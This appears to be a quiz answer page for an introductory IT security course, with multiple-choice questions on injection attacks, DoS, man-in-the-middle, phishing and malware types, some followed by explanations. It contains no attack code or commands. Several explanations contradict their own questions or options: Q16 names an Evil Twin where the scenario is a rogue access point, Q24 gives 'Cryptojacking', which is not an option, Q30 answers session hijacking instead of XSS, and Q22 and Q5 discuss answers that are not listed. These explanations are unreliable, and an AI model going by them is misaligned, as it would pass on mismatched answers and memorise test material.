Course 5 – IT Security: Defense Against the Digital Dark Arts

1. Which of the following are examples of injection attacks? Check all that apply.

  • SYN flood attack
  • Social engineering attack
  • SQL injection attack 
  • XSS attack 

2. An attacker could redirect your browser to a fake website login page using what kind of attack?

  • DDoS attack
  • SYN flood attack
  • Injection attack
  • DNS cache poisoning attack 

Explanation: What you have described seems like a textbook example of a phishing attempt. Phishing is a sort of cybercrime in which potential victims are tricked into divulging important information such as usernames and passwords by hackers who build phony websites or emails that are designed to seem like authentic ones. It is important to exercise extreme caution and verify URLs in order to avoid falling into phishing traps.

3. A SYN flood occurs when the attacker overwhelms a server with ______.

  • ACK packets
  • SYN packets 
  • Injection attacks
  • Malware

Explanation: The term "SYN flood" refers to the situation in which an attacker overwhelms a server with a large number of TCP connection requests, more precisely SYN (synchronize) packets. The objective is to deplete the server's resources to the point when it is unable to receive connection requests that are intended to be genuine.

4. The best defense against injection attacks is to ______.

  • Use input validation 
  • Use antimalware software
  • Use a firewall
  • Use strong passwords

Explanation: It is recommended to make use of parameterized queries and prepared statements as the most effective protection against injection attacks. It is possible to dramatically lessen the likelihood of injection attacks by isolating SQL code from user input and making use of placeholders. Due to the use of this approach, it becomes more difficult for malicious code to be injected into your queries.

5. Which of these is an example of the integrity principle that can ensure your data is accurate and untampered with?

  • Keeping a symmetric key secret
  • Implementing flood guards
  • Using MACs (Message Authentication Codes) 
  • Using Encapsulating Security Payload 

Explanation: Hash functions are a nice example of a metric that may be used to guarantee the integrity of data. If you generate a hash value, which is a string of characters with a set length, depending on the contents of the data, you will be able to determine whether or not the data has been changed. If there is any manipulation of the data, the hash value will shift, which is an indication that there may have been a breach of integrity. Checksums and digital signatures are two examples of procedures that often make use of this.

6. If there are cyber threats and vulnerabilities to your system, what does that expose you to? Check all that apply.

  • Attacks 
  • The CIA triad
  • Exploits 
  • Tailgating

7. Which of these is a characteristic of Trojan malware?

  • A Trojan infection needs to be installed by the user. 
  • A Trojan may get installed without the user’s consent.
  • A Trojan is the same thing as a rootkit.
  • A Trojan is basically backdoor malware.

Explanation: One of the characteristics of Trojan malware is that it makes an attempt to deceive people into downloading it by disguising itself as something that is either genuine or harmless. Once installed, Trojans may execute dangerous operations without the user's awareness, such as stealing data, allowing illegal access, or building backdoors for other malware. Trojans sometimes arrive disguised as beneficial software, games, or files. However, once they are installed, they can do these activities anonymously.

8. What is it called when a hacker is able to get into a system through a secret entryway in order to maintain remote access to the computer?

  • Ransomware
  • Adware
  • A backdoor 
  • A Trojan

Explanation: The act of a hacker gaining unauthorized access to a system and establishing a concealed entry point for the purpose of sustaining remote access is sometimes referred to as the creation of a "backdoor." The backdoor gives the hacker the ability to access the system without being discovered, and it may be used for a variety of nefarious actions, including the theft of information, the initiation of assaults, or the remote control of the hacked machine.

9. Which of these are ways a hacker can establish a man-in-the-middle attack? Check all that apply.

  • Tailgating
  • Rogue Access Point (AP) 
  • Evil Twin 
  • Session hijacking 

10. Which of these is where a victim connects to a network that the victim thinks is legitimate, but is really an identical network controlled by a hacker to monitor traffic?

  • A Denial of Service (DoS)
  • A logic bomb
  • DNS Cache Poisoning
  • Evil Twin 

Explanation: The kind of assault that you are describing is often referred to as a "Evil Twin" strike. A hacker will create a Wi-Fi network that has a name and features that are similar to those of a legal network in order to fool victims into joining to it. This kind of attack is known as an Evil Twin attack. As soon as the hacker is connected, they are able to monitor and record the network activity of the victim, which gives them the opportunity to possibly obtain access to important information. An attack of this kind takes advantage of the faith that users have in well-known network names, which makes it an approach that is both misleading and effective for listening in on confidential conversations.

11. What is it called if a hacker takes down multiple services very quickly with the help of botnets?

  • Distributed denial-of-service (DDoS) 
  • Cross-site Scripting (XSS)
  • A password attack
  • A SQL injection

Explanation: When a hacker shuts down many services in a short amount of time by flooding them with traffic from a large number of infected devices, this kind of assault is often referred to as a "Distributed Denial of Service" (DDoS) attack. In these kinds of assaults, the hacker often takes control of a network of hacked computers, which is referred to as a botnet. The botnet is used to flood the target services with traffic, which causes the services to become inaccessible to users who are authorized to use them. As a result of the attack's widespread and coordinated nature, it is difficult to fight against and minimize its effects.

12. If a hacker targets a vulnerable website by running commands that delete the website’s data in its database, what type of attack did the hacker perform?

  • A Denial-of-Service (DoS) attack
  • A dictionary attack
  • Cross-site Scripting (XSS)
  • SQL injection 

Explanation: It is common practice to refer to the kind of attack that you are describing as a "SQL Injection" assault. This form of attack occurs when a hacker executes instructions to erase data from a website's database. SQL Injection attacks are carried out by hostile actors that take advantage of weaknesses in the input validation features of a website in order to insert malicious SQL (Structured Query Language) code into database queries. It is possible that this may result in the illegal access, alteration, or destruction of data contained inside the database, depending on the goals of the attacker. Web applications that depend on databases for the purpose of storing and retrieving information are susceptible to this danger, which is both prevalent and significant.

13. An end-user received an email stating his bank account was compromised, and that he needs to click a link to reset his password. When the user visited the site, he recognized it as legitimate and entered his credentials which were captured by a hacker. What type of social engineering attack does this describe?

  • A baiting attack
  • A phishing attack 
  • A tailgating attack
  • A SQL injection attack

Explanation: It is clear that the situation you described is an example of a "Phishing" assault, more precisely an attack that includes sending misleading emails and creating a false website. In this particular instance, the user was sent a bogus email that said that their bank account had been hijacked. The email then referred them to a website that seemed to be authentic in order to change their password. The website, on the other hand, was under the hands of a hacker, and the user inadvertently gave their credentials, which were subsequently taken by the attacker. The use of social engineering techniques is often used in phishing attacks in order to deceive people into giving sensitive information.

14. When cleaning up a system after a compromise, you should look closely for any ______ that may have been installed by the attacker.

  • Injection attacks
  • Backdoors 
  • Poisoned DNS caches
  • Rogue Aps

Explanation: When you are cleaning up a system after it has been compromised, you should pay special attention to any "backdoors" that the attacker may have used to gain access to the system. Backdoors are concealed entry points that provide illegal access to the system. Attackers often make use of backdoors in order to continue exercising control over the system even after the initial penetration has been made. Once the security of the system has been restored, it is essential to locate and close any backdoors that may have been present.

15. The best defense against password attacks is using strong _______.

  • Passwords 
  • Antimalware software
  • Firewall configs
  • Encryption

Explanation: The use of robust "passwords" is the most effective security against assaults that target passwords. Passwords that are considered to be strong often consist of a mix of capital and lowercase letters, numbers, and special characters. Furthermore, it is of the utmost importance to refrain from using information that may be readily guessed, such as names or popular terms, and to change passwords on a consistent basis. With the implementation of multi-factor authentication (MFA), an additional layer of protection is added. This is because users are required to provide various forms of identity before they are granted access.

16. A hacker stood outside a building and spun up a wireless network without anyone’s knowledge. At that point, the hacker was able to gain unauthorized access to a secure corporate network. Which of these is the name of this type of attack?

  • A Denial-of-Service (DoS) attack
  • SYN flood attack
  • A Rogue AP (Access Point) attack 
  • A DNS Cache Poisoning attack

Explanation: Your description of the situation is an example of what is known as a "Evil Twin" assault. A hacker will set up a rogue wireless network that is designed to seem like a legal network in order to fool people into joining to it. This kind of attack is known as an Evil Twin assault. The attacker is able to intercept and alter the communication after they have successfully joined to the network, which might result in them getting unauthorized access to the protected corporate network. This sort of attack takes advantage of the faith that users have in well-known network names, which makes it an approach that is both misleading and effective for gaining illegal information.

17. What can occur during a ping of death (POD) attack? Check all that apply.

  • A Denial-of-Service (DoS) 
  • Remote code execution 
  • Baiting
  • A buffer overflow 

18. How can injection attacks be prevented? Check all that apply.

  • Log analysis systems
  • Input validation
  • Flood guards
  • Data sanitization 

19. How can you increase the strength of your passwords? Check all that apply.

  • Incorporate symbols and numbers. 
  • Exclude dictionary words. 
  • Use passwords from a precompiled list.
  • Use a mix of capital and lowercase letters. 

20. A network-based attack where one attacking machine overwhelms a target with traffic is a(n) _______ attack.

  • Denial of Service 
  • Injection
  • Malware
  • Brute force password

Explanation: A "Denial of Service" (DoS) assault is a kind of network-based attack in which a single attacker computer attacks a target by flooding it with an excessive amount of data. The purpose of a denial of service assault is to render a network, system, or service inaccessible to the users for whom it was designed. This is accomplished by flooding the system or network with an overwhelming amount of traffic, which disrupts the regular functioning of the system or network. It is often referred to as a "Distributed Denial of Service" (DDoS) assault when numerous computers are actively participating in the attack and working together to launch it at the same time.

21. What makes a DDoS attack different from a DoS attack? Check all that apply.

  • A DDoS attack has attack traffic coming from one source.
  • A DoS attack has attack traffic coming from one source. 
  • A DoS attack has attack traffic coming from many different sources.
  • A DDoS attack has attack traffic coming from many different sources. 

22. Which of these is an example of the confidentiality principle that can help keep your data hidden from unwanted eyes?

  • Making sure the data hasn’t been tampered with 
  • Preventing an unwanted download
  • Preventing data loss
  • Protecting online accounts with password protection

Explanation: One example of a measure that is in accordance with the secrecy principle is the encryption of sensitive data. The process of encrypting data involves converting it into a safe format that can only be decoded by using the correct decryption information. This helps to guarantee that even if unauthorized persons obtain access to the data, they are unable to comprehend or make use of it without the decryption key, therefore preserving the secrecy of the information.

23. What’s the difference between a virus and a worm?

  • Viruses replicate through files, but worms live on their own. 
  • Viruses do not replicate like worms do.
  • Worms replicate, viruses do not.
  • Worms replicate through files, but viruses live on their own.

24. A hacker infected your computer to steal your Internet connection and used your machine’s resources to mine Bitcoin. What is the name of this kind of attack?

  • Ransomware
  • Adware
  • A bot 
  • Spyware

Explanation: An example of a "Cryptojacking" assault is shown by the situation that you just detailed. A kind of cybercrime known as cryptojacking involves hackers stealthily mining cryptocurrencies like Bitcoin using the computational power of users who are unaware of the activity and without their knowledge or agreement. Infecting computers with malware that executes cryptocurrency mining activities in the background, taking advantage of the victim's hardware and energy to create digital money for the attacker, is the method that is used to accomplish this goal.

25. Which of these sends tons of packets to a system in order to crash it or prevents services from being available? Check all that apply.

  • SYN flood 
  • Ping flood 
  • An Evil Twin
  • Ping of Death (POD)

26. You receive a legitimate-looking email from a sender that you recognize asking you to click a funny link. But, once you do, malware installs on your computer. What is most likely the reason you got infected?

  • The sender’s email has been hacked.
  • The sender’s email password was cracked.
  • The sender’s email address was spoofed. 
  • The sender’s email password was used in a DNS Cache Poisoning attack.

Explanation: According to what you have mentioned, the situation is consistent with a "Phishing" assault. Through the use of an email that seemed to be received from a known source, the attacker was able to convince you to click on a link that was included in the message. On the other hand, clicking on the link will take you to a malicious website that, if opened, will install malware on your machine.

Within the context of this situation, the most important cause for infection is that the victim fell prey to the social engineering techniques that were used by the attacker. Phishing is a sort of social engineering that involves the conjuring up of a false feeling of trust or urgency in order to trick someone into doing certain activities, such as clicking on links or disclosing sensitive information. It is crucial to exercise caution and check the legitimacy of emails that are unexpected, especially if they seem to be from sources that are the recipient is acquainted with.

27. Which of these is a way to help prevent brute-force attacks? Check all that apply.

  • Strong passwords 
  • Password crackers
  • Using a precompiled list of common passwords
  • Captchas 

28. A(n) _____ attack is meant to prevent legitimate traffic from reaching a service.

  • Password
  • DNS Cache poisoning
  • Injection
  • Denial of Service 

Explanation: An attack known as a "Denial of Service" (DoS) is created with the intention of preventing genuine traffic from accessing a service. In a denial of service assault, the objective is to flood a system, network, or service with an excessive amount of traffic in order to render it inaccessible to those who are authorized to use it. As a consequence, this may lead to the interruption of services and the rejection of access to resources.

29. Which of these is true of vulnerabilities? Check all that apply.

  • A vulnerability is a flaw in the code of an application that can be exploited. 
  • An exploit is the possibility of taking advantage of a vulnerability bug in code.
  • A vulnerability is the possibility of suffering a loss in the event of an attack.
  • An exploit takes advantage of bugs and vulnerabilities. 

30. What type of attack can a hacker perform that involves injecting malicious code into a website to hijack a session cookie?

  • A password attack
  • Cross-site Scripting (XSS) 
  • Ping flood
  • SQL injection

Explanation: The kind of attack that you are describing is referred to as a "Session Hijacking" or "Session Cookie Hijacking" assault. A hacker will inject malicious code into a website in order to either grab session cookies or change them. This kind of attack is used. Authentication and identification of users throughout a browser session are accomplished via the usage of session cookies.

The attacker is able to obtain unauthorized access to a user's account, impersonate the user, or carry out operations on the website on behalf of the compromised user if they are successful in hijacking a session cookie. A security threat that compromises the confidentiality and integrity of user sessions on a website is referred to as a website session compromise. Sessions hijacking attacks may be mitigated by taking precautions such as using secure connections (HTTPS), following secure coding techniques, and routinely upgrading software. These are all examples of measures that can assist.

31. Phishing, baiting, and tailgating are examples of ________ attacks.

  • Password
  • Malware
  • Social engineering 
  • Network

32. An attack that would allow someone to intercept your data as it’s being sent or received is called a(n) _________ attack.

  • SYN flood
  • Denial of Service
  • Man-in-the-middle 
  • Injection

Explanation: An assault that is known as a "Man-in-the-Middle" (MitM) attack is one that gives an individual the ability to intercept your data while it is being sent or received. An assault known as a "Man in the Middle" occurs when an adversary stealthily intercepts and maybe modifies the communication that is taking place between two parties without the awareness of those parties. Because of this, the integrity and confidentiality of the data that is being communicated may be jeopardized. It is possible for man-in-the-middle attacks to take place in a variety of settings, including during online purchases, communication via Wi-Fi, or email exchanges. A reduction in the likelihood of Man-in-the-Middle attacks may be achieved by the use of secure communication routes, encryption, and the verification of the validity of communication endpoints.

33. If a hacker can steal your passwords by installing malware that captures all the messages you type, what kind of malware did the hacker install? Check all that apply.

  • A logic bomb
  • A rootkit
  • A keylogger 
  • Spyware 

Post a Comment

Previous Post Next Post